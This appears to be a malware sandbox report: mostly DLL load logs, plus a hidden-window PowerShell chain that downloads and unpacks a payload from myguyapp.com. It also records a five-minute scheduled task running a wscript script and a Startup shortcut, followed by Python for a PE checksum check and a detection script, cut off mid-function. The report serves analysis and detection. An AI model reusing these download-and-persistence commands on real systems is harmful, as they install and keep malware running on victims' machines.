    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: napinsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: pnrpnsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wshbth.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: nlaapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winrnr.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,13_2_004062FC
    Source: msword.exe.11.drStatic PE information: header CheckSum field is 0x14327c, computed checksum is 0x14956c (mismatch: the file was modified after the checksum was written, or the field was never set correctly)
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90DE6 push ecx; ret 38_2_00C90DF9
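    The checksum mismatch reported for msword.exe above can be reproduced offline. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it implements the PE image checksum algorithm (the one CheckSumMappedFile uses: 32-bit words summed with end-around carry, the CheckSum field itself skipped, folded to 16 bits, plus the file length) and compares the result with the field stored in the optional header. The 256-byte header-only image it builds is constructed for the example; on real samples the bytes are read from disk instead.

```python
import struct

# Header offsets fixed by the PE/COFF format
E_LFANEW_OFFSET = 0x3C                 # DWORD in the DOS header: file offset of "PE\0\0"
COFF_HEADER_SIZE = 20
CHECKSUM_IN_OPTIONAL_HEADER = 0x40     # OptionalHeader.CheckSum, same offset for PE32 and PE32+


def checksum_field_offset(data: bytes) -> int:
    """File offset of the CheckSum field, located through e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return pe_off + 4 + COFF_HEADER_SIZE + CHECKSUM_IN_OPTIONAL_HEADER


def pe_checksum(data: bytes) -> int:
    """PE image checksum as the loader computes it (CheckSumMappedFile)."""
    cs_off = checksum_field_offset(data)
    if cs_off % 4:
        raise ValueError("CheckSum field is not DWORD-aligned")
    padded = data + b"\0" * (-len(data) % 4)          # last partial DWORD is zero-padded
    total = 0
    for off in range(0, len(padded), 4):
        if off == cs_off:
            continue                                    # the stored field does not count
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)            # fold to 16 bits
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)                            # plus the unpadded file length


def verify_checksum(data: bytes):
    """Return (stored, computed, matches). A stored 0 means the linker set none."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_sample_image(stored_checksum: int) -> bytes:
    """Constructed 256-byte stand-in for a PE file: DOS header, PE signature,
    COFF header and the start of a PE32 optional header, no sections."""
    buf = bytearray(256)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x44, 0x014C, 1)          # Machine i386, NumberOfSections 1
    struct.pack_into("<HH", buf, 0x54, 0xE0, 0x0102)       # SizeOfOptionalHeader, Characteristics
    struct.pack_into("<H", buf, 0x58, 0x10B)               # Magic PE32
    struct.pack_into("<I", buf, 0x58 + CHECKSUM_IN_OPTIONAL_HEADER, stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image(0x14327C)
    stored, computed, ok = verify_checksum(data)
    print(f"stored 0x{stored:x}, computed 0x{computed:x}, {'match' if ok else 'MISMATCH'}")
```

    Run it with a file path to check a real binary. A stored value of 0 is normal for user-mode executables, since most linkers only fill the field for drivers and system DLLs; a non-zero stored value that disagrees with the computed one, as for msword.exe here, means the bytes changed after the field was written, which is what patching and packing leave behind.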

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
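    The hidden PowerShell download-and-extract chain under Data Obfuscation and the scheduled task above give concrete command lines to match on. The following Python is an added example, not code from the report or from Joe Sandbox: it evaluates process-creation command lines against checks that mirror those signatures (a hidden-window PowerShell download to a user-writable path, Expand-Archive into such a path, a scheduled task whose action launches a script host from under \Users\...\AppData, and a minute-interval trigger). The sample events are constructed: the first three are the command lines this report records, the last two are benign lines added for contrast. The rule names, the USER_WRITABLE path set and the script-host list are assumptions of the example, not Sigma rule content.

```python
import re
from typing import Iterable, List, Tuple

# Constructed process-creation events (parent image, command line).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("cmd.exe", r'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"'),
    ("cmd.exe", r'powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"'),
    ("cmd.exe", r'''schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F'''),
    ("explorer.exe", r'powershell -NoProfile -Command "Get-ChildItem C:\Windows\Temp"'),          # benign, constructed
    ("cmd.exe", r'schtasks.exe /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'),  # benign, constructed
]

# Locations a standard user can write to; every stage in this report lands in one of them.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)(\\|$)", re.I)
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh|rundll32|regsvr32)(\.exe)?\b", re.I)
DOWNLOAD_VERBS = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def program(cmdline: str) -> str:
    """Basename of the first token, lower-cased and without '.exe'."""
    m = re.match(r'\s*("[^"]*"|\S+)', cmdline)
    tok = m.group(1).strip('"') if m else ""
    name = tok.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def arg_value(cmdline: str, name: str) -> str:
    """Value following -name or /name (quoted, or one bare token), else ''.
    Bare values stop at whitespace, so an unquoted path with spaces is truncated."""
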